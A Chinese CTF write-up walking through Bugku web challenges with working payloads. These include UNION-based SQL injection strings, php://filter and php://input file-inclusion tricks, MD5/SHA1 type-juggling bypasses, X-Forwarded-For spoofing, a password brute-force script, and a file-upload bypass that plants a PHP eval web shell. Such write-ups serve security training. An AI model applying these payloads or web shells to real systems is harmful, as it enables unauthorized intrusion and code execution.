Bugku Web类题目
web2 打开网页,F12
文件上传测试 Flag格式:Flag:xxxxxxxxxxxxx
计算器 打开网页,输入答案发现前端限制了字符长度
web基础$_GET Payload 1 http://120.24.86.145:8002/get/?what=flag
web基础$_POST 火狐HackBar发送post数据,
Payload 1 2 3 import requestsr = requests.post('http://120.24.86.145:8002/post/' ,data={'what' :'flag' }) print(r.text)
矛盾 做了过滤,用注释符过滤
源码 1 2 3 4 5 6 7 $num=$_GET['num' ]; if (!is_numeric($num)) { echo $num;if ($num==1 )echo 'flag{**********}' ;}
Payload 1 http://120.24.86.145:8002/get/index1.php?num=1xx
web3 打开会有弹框,直接查看源码
html编码,解码即可
sql注入 格式KEY{}
Payload 1 2 http://103.238.227.13:10083/?id=0%df' union select 1,database() %23 http://103.238.227.13:10083/?id=0%df' union select 1,string from sql5.key %23
域名解析 修改本机hosts值,或者用bp抓包修改host
Payload 1 2 3 4 5 6 7 8 9 GET /? HTTP/1.1 Host: ctf.bugku.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: Connection: close Upgrade-Insecure-Requests: 1
sql1 Payload 1 2 ? id=1 unio<>n selec<>t 1,database() %23 ?id=1 uni<a>on sel<a>ect 1,hash fr<a>om sql3.key%23
你必须让他停下 右键源代码,一直按F5直到flag is here处出现flag
本地包含 1 2 3 4 5 6 <?php include "flag.php" ; $a = @$_REQUEST['hello' ]; eval ( "var_dump($a);" ); show_source(__FILE__ ); ?>
Payload 1 http://120.24.86.145:8003/index.php?hello=file("flag.php")
变量1 源代码 1 2 3 4 5 6 7 8 9 10 11 12 13 flag In the variable ! <?php error_reporting(0 ); include "flag1.php" ;highlight_file(__file__ ); if (isset ($_GET['args' ])){ $args = $_GET['args' ]; if (!preg_match("/^\w+$/" ,$args)){ die ("args error!" ); } eval ("var_dump($$args);" ); } ?>
$$表示可变变量,输入args=flag,则$$args=$flag
php超全局变量 1 2 3 4 5 6 7 8 9 $GLOBALS $_SERVER $_GET $_POST $_FILES $_COOKIE $_SESSION $_REQUEST $_ENV
测试发现flag在GLOBALS里
Payload 1 http://120.24.86.145:8004/index1.php?args=GLOBALS
参考:bugku 变量1 - CSDN博客
web5 右键源代码,jsfuck,复制内容直接F12在consoleli执行即可
头等舱 flag在响应头里233
网站被黑 网站被黑一般都会有shell,用御剑扫描↓
管理员系统 右键审查元素看到被base64编码过的密码(右键源代码在第5023行),提示IP禁止访问,请联系本地管理员登陆,IP已被记录.,所以这里需要修改数据包。
1 X-Forwarded-For: 127.0.0.1
X-Forwarded-For(XFF) 在客户端访问服务器的过程中如果需要经过HTTP代理或者负载均衡服务器,可以被用来获取最初发起请求的客户端的IP地址,这个消息首部成为事实上的标准。在消息流从客户端流向服务器的过程中被拦截的情况下,服务器端的访问日志只能记录代理服务器或者负载均衡服务器的IP地址。如果想要获得最初发起请求的客户端的IP地址的话,那么 X-Forwarded-For 就派上了用场。
X-Forwarded-For也是一个电子邮件相关协议中用到的首部,用来表示一封电子邮件是从其他账户转发过来的。
web4 右键源代码,url解码得到代码
1 2 3 var p1 = 'function checkSubmit(){var a=document.getElementById("password");if("undefined"!=typeof a){if("67d709b2b' ;var p2 = 'aa648cf6e87a7114f1"==a.value)return!0;alert("Error");a.focus();return!1}}document.getElementById("levelQuest").onsubmit=checkSubmit;' ;eval (unescape(p1) + unescape('54aa2' + p2));
拼接的到MD5值:67d709b2b54aa2aa648cf6e87a7114f1,提交就可以得到flag
flag在index里 文件包含,参考:谈一谈php://filter的妙用
Payload 1 http://120.24.86.145:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
base64解码得到flag
输入密码查看flag 五位数密码爆破,用脚本爆破
Payload 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 import requests,redef main () : url = 'http://120.24.86.145:8002/baopo/' s = requests.session() r = s.get(url) for i in range(10000 ,100000 ): r = s.post(url, data={'pwd' : i}) r.encoding='utf-8' a = re.findall(r'密码不正确,请重新输入' ,r.text) if a: pass else : print(r.text) break main()
点击一百万次 源代码 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 <script> var clicks=0 $(function ( $("#cookie" ) .mousedown(function ( $(this ).width('350px' ).height('350px' ); }) .mouseup(function ( $(this ).width('375px' ).height('375px' ); clicks++; $("#clickcount" ).text(clicks); if (clicks >= 1000000 ){ var form = $('<form action="" method="post">' + '<input type="text" name="clicks" value="' + clicks + '" hidden/>' + '</form>' ); $('body' ).append(form); form.submit(); } }); }); </script>
python脚本 1 2 3 4 import requests,rer = requests.post('http://120.24.86.145:9001/test/' ,data={'clicks' :1000000 }) a = re.findall(r'flag{(.*)}' , r.text) print('flag{%s}' %a[0 ])
听说备份是个好习惯 备份的话可能是文件后面加.bak的文件,Linux运维习惯233http://120.24.86.145:8002/web16/index.php.bak,下载到源码
index.php源代码 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 <?php include_once "flag.php" ;ini_set("display_errors" , 0 ); $str = strstr($_SERVER['REQUEST_URI' ], '?' ); $str = substr($str,1 ); $str = str_replace('key' ,'' ,$str); parse_str($str); echo md5($key1);echo md5($key2);if (md5($key1) == md5($key2) && $key1 !== $key2){ echo $flag."取得flag" ; } ?>
因为会把key替换掉,所以可以用kekeyy这样的形式绕过
利用php弱类型绕过MD5判断http://120.24.86.145:8002/web16/index.php?kekeyy1=s878926199a&kekeyy2=s214587387a
利用数组绕过md5判断http://123.206.87.240:8002/web16/index.php?kekeyy1[]=a&kekeyy2[]=b
构造url得到flag:
成绩单 判断注入点 1 2 id=0 id=0' union select 1,2,3,4#
查询 1 2 3 4 id=0' union select 1,2,3,database()# id=0' union select 1,2,3,table_name from information_schema.tables where table_schema=database()# id=0' union select 1,2,3,column_name from information_schema.columns where table_name='fl4g'# id=0' union select 1,2,3,skctf_flag from fl4g#
秋名山老司机 Payload 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 import requests,redef main () : url = 'http://120.24.86.145:8002/qiumingshan/' s = requests.session() r = s.get(url) a = re.findall(r'<div>(.*)=\?;</div>' ,r.text) a = eval(a[0 ]) r = s.post(url,data={'value' :a}) r.encoding = 'utf-8' print(r.text) main()
速度要快 Payload 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 import requestsfrom base64 import b64decodedef main () : url = 'http://120.24.86.145:8002/web6/' s = requests.session() req = s.get(url) data = str(b64decode((req.headers)['flag' ]),encoding='utf-8' ) data = b64decode(data.split(':' )[1 ]) response = s.post(url,data={'margin' :data}) print(response.text) main()
cookies欺骗 url上有base64的参数,解码是key.txt,把参数换成index.php,发现line按行返回 ,一共18行全部抓下来
python抓取代码 1 2 3 4 5 6 7 8 9 10 11 12 import requestsfrom base64 import b64encodedef main () : url = 'http://123.206.87.240:8002/web11/' for i in range(20 ): data = {"line" : i, "filename" : b64encode(b"index.php" )} req = requests.get(url,params=data) print(req.text) main()
index.php源码 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 error_reporting(0 ); $file=base64_decode(isset ($_GET['filename' ])?$_GET['filename' ]:"" ); $line=isset ($_GET['line' ])?intval($_GET['line' ]):0 ; if ($file=='' ) header("location:index.php?line=&filename=a2V5cy50eHQ=" ); $file_list = array ( '0' =>'keys.txt' , '1' =>'index.php' , ); if (isset ($_COOKIE['margin' ]) && $_COOKIE['margin' ]=='margin' ){ $file_list[2 ]='keys.php' ; } if (in_array($file, $file_list)){ $fa = file($file); echo $fa[$line]; } ?>
所以我们需要访问的filename为key.php,并且需要在cookie中加入margin=margin参数http://120.24.86.145:8002/web11/index.php?line=&filename=a2V5cy5waHA=
XSS 反射性注入,发现<与>被过滤,unicode编码绕过
Payload never give up 右键源代码
访问:view-source:http://120.24.86.145:8006/test/1p.html
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 <HTML > <HEAD > <SCRIPT LANGUAGE ="Javascript" > <!-- var Words ="%3Cscript%3Ewindow.location.href%3D%27http%3A//www.bugku.com%27%3B%3C/script%3E%20%0A%3C%21--JTIyJTNCaWYlMjglMjElMjRfR0VUJTVCJTI3aWQlMjclNUQlMjklMEElN0IlMEElMDloZWFkZXIlMjglMjdMb2NhdGlvbiUzQSUyMGhlbGxvLnBocCUzRmlkJTNEMSUyNyUyOSUzQiUwQSUwOWV4aXQlMjglMjklM0IlMEElN0QlMEElMjRpZCUzRCUyNF9HRVQlNUIlMjdpZCUyNyU1RCUzQiUwQSUyNGElM0QlMjRfR0VUJTVCJTI3YSUyNyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJTI3YiUyNyU1RCUzQiUwQWlmJTI4c3RyaXBvcyUyOCUyNGElMkMlMjcuJTI3JTI5JTI5JTBBJTdCJTBBJTA5ZWNobyUyMCUyN25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJTI3JTNCJTBBJTA5cmV0dXJuJTIwJTNCJTBBJTdEJTBBJTI0ZGF0YSUyMCUzRCUyMEBmaWxlX2dldF9jb250ZW50cyUyOCUyNGElMkMlMjdyJTI3JTI5JTNCJTBBaWYlMjglMjRkYXRhJTNEJTNEJTIyYnVna3UlMjBpcyUyMGElMjBuaWNlJTIwcGxhdGVmb3JtJTIxJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuJTI4JTI0YiUyOSUzRTUlMjBhbmQlMjBlcmVnaSUyOCUyMjExMSUyMi5zdWJzdHIlMjglMjRiJTJDMCUyQzElMjklMkMlMjIxMTE0JTIyJTI5JTIwYW5kJTIwc3Vic3RyJTI4JTI0YiUyQzAlMkMxJTI5JTIxJTNENCUyOSUwQSU3QiUwQSUwOXJlcXVpcmUlMjglMjJmNGwyYTNnLnR4dCUyMiUyOSUzQiUwQSU3RCUwQWVsc2UlMEElN0IlMEElMDlwcmludCUyMCUyMm5ldmVyJTIwbmV2ZXIlMjBuZXZlciUyMGdpdmUlMjB1cCUyMCUyMSUyMSUyMSUyMiUzQiUwQSU3RCUwQSUwQSUwQSUzRiUzRQ%3D%3D--%3E" function OutWord () { var NewWords;NewWords = unescape (Words); document .write(NewWords);} OutWord(); </SCRIPT > </HEAD > <BODY > </BODY > </HTML >
解码顺序:url解码→base64解码→url解码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 if (!$_GET['id' ]){ header('Location: hello.php?id=1' ); exit (); } $id=$_GET['id' ]; $a=$_GET['a' ]; $b=$_GET['b' ]; if (stripos($a,'.' )) { echo 'no no no no no no no' ; return ; } $data = @file_get_contents($a,'r' ); if ($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111" .substr($b,0 ,1 ),"1114" ) and substr($b,0 ,1 )!=4 ){ require ("f4l2a3g.txt" ); } else { print "never never never give up !!!" ; } ?>
if(!$_GET['id'])$id必须为非空非零变量
if(stripos($a,'.')).
$data = @file_get_contents($a,'r'); $date=="bugku is a nice plateform!"@file_get_contents($a,'r')弱等于 "bugku is a nice plateform!"$data是由file_get_contents()函数读取变量$a的值而得,所以$a的值必须为数据流。bugku is a nice plateform!文件,再把此文件路径赋值给$a,显然不太现实。php://来访问输入输出的数据流,其中php://input可以访问原始请求数据中的只读流。这里令$a=php://input,并在请求主体中提交字符串bugku is a nice plateform!。
$id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
$id==0php官网的PHP类型比较表php松散比较==
strlen($b)>5
eregi(“111”.substr($b,0,1),”1114”)substr($b,0,1)获取变量b的第一个字符,"111".substr($b,0,1)拼接,即’111x’(x表示变量b的第一个字符)
substr($b,0,1)!=4111%00被解析为111,最后变量b可以为%0011111
payload 1 2 url:http://123.206.87.240:8006/test/hello.php?id=php&a=php://input&b=%0011111 post:bugku is a nice plateform!
参考:never give up
非预期解 访问http://120.24.86.145:8006/test/f4l2a3g.txt得到flag
welcome to bugkuctf 参考:Bugku——welcome to bugkuctf(一道练习php://filter和php://input的好题)
过狗一句话 源码 1 2 3 4 5 6 <?php $poc="a#s#s#e#r#t" ; $poc_1=explode("#" ,$poc); $poc_2=$poc_1[0 ].$poc_1[1 ].$poc_1[2 ].$poc_1[3 ].$poc_1[4 ].$poc_1[5 ]; $poc_2($_GET['s' ]) ?>
assert执行任意代码
payload 1 http://123.206.87.240:8010/?s=var_dump(scandir('./'))
访问flag文件即可 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 array(6) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(8) "f14g.txt" [3]=> string(9) "index.php" [4]=> string(4) "xxxx" [5]=> string(19) "保护ctf人人有责.txt" } can you get flag?
字符?正则? 源代码 1 2 3 4 5 6 7 8 <?php highlight_file('2.php' ); $key='KEY{********************************}' ; $IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i" , trim($_GET["id" ]), $match); if ( $IM ){ die ('key is: ' .$key); } ?>
这是一道考正则表达式的题目/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i
key、key:这种直接写出来的可以直接利用.表示匹配除\n之外的任何单个字符,即可以输入任何字符{4,7}表示前一个字符可以出现的次数范围,.{4,7}即任意字符出现4-7次\转义字符[a,z]表示a-z任意一个小写字母[[:punct:]]表示匹配任何标点符号i表示不区分大小写
payload 1 http://123.206.87.240:8002/web10/?id=key.key....key:/./.keya.
前女友(SKCTF) 源码 1 2 3 4 5 6 7 8 9 10 11 12 <?php if (isset ($_GET['v1' ]) && isset ($_GET['v2' ]) && isset ($_GET['v3' ])){ $v1 = $_GET['v1' ]; $v2 = $_GET['v2' ]; $v3 = $_GET['v3' ]; if ($v1 != $v2 && md5($v1) == md5($v2)){ if (!strcmp($v3, $flag)){ echo $flag; } } } ?>
md5可用v1=QNKCDZO&v2=240610708绕过,strcmp()在比较字符串和数组的时候直接返回0,用v3[]=1绕过
payload 1 http://123.206.31.85:49162/?v1=QNKCDZO&v2=240610708&v3[]=1
login1(SKCTF) 提示SQL约束攻击,百度了下基本知道怎么做了基于约束的SQL攻击
你从哪里来
Referer头域允许客户端指定请求uri的源资源地址,这可以允许服务器生成 回退链表,可用来登陆、优化cache等。他也允许废除的或错误的连接由于维护的目的被追踪。如果请求的uri没有自己的uri地址,Referer不能 被发送。如果指定的是部分uri地址,则此地址应该是一个相对地址。
只要在请求头中添加Referer: https://www.google.com即可获取flag
md5 collision(NUPT_CTF) MD5碰撞
payload 1 http://123.206.87.240:9009/md5.php?a=240610708
程序员本地网站 又是一道本地登录的题,添加X-Forwarded-For为本地的参数即可
1 X-Forwarded-For : 127.0.0.1
各种绕过 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 <?php highlight_file('flag.php' ); $_GET['id' ] = urldecode($_GET['id' ]); $flag = 'flag{xxxxxxxxxxxxxxxxxx}' ; if (isset ($_GET['uname' ]) and isset ($_POST['passwd' ])) { if ($_GET['uname' ] == $_POST['passwd' ]) print 'passwd can not be uname.' ; else if (sha1($_GET['uname' ]) === sha1($_POST['passwd' ])&($_GET['id' ]=='margin' )) die ('Flag: ' .$flag); else print 'sorry!' ; } ?>
可利用sha函数不能处理数组的方式绕过,即uname[]=a===passwd[]=b
payload 1 2 3 http://123.206.87.240:8002/web7/?id=margin&uname[]=a [post data] passwd[]=b
web8 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 <?php extract($_GET); if (!empty ($ac)){ $f = trim(file_get_contents($fn)); if ($ac === $f){ echo "<p>This is flag:" ." $flag</p>" ;} else { echo "<p>sorry!</p>" ;} } ?>
payload 1 2 3 http://123.206.87.240:8002/web8/?ac=a&fn=php://input [post data] a
细心 主页什么都没有,用御剑扫描后发现有robots.txt文件,访问resusl.php提示if ($_GET[x]==$password) 此处省略1w字
1 http://123.206.87.240:8002/web13/resusl.php?x=admin
getshell 上传绕过题
payload 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 POST /web9/index.php HTTP/1.1Host : 123.206.87.240:8002User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0Accept : text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language : zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding : gzip, deflateReferer : http://123.206.87.240:8002/web9/Connection : closeUpgrade-Insecure-Requests : 1Content-Type : Multipart/form-data; boundary=---------------------------140101553129150 #m大写绕过Content-Length : 332-----------------------------140101553129150 Content-Disposition : form-data; name="file"; filename="1.php5" #php5可绕过Content-Type : image/jpeg #数据类型改成图片<?php @eval($_GET["code"])?> -----------------------------140101553129150 Content-Disposition : form-data; name="submit"Submit -----------------------------140101553129150--
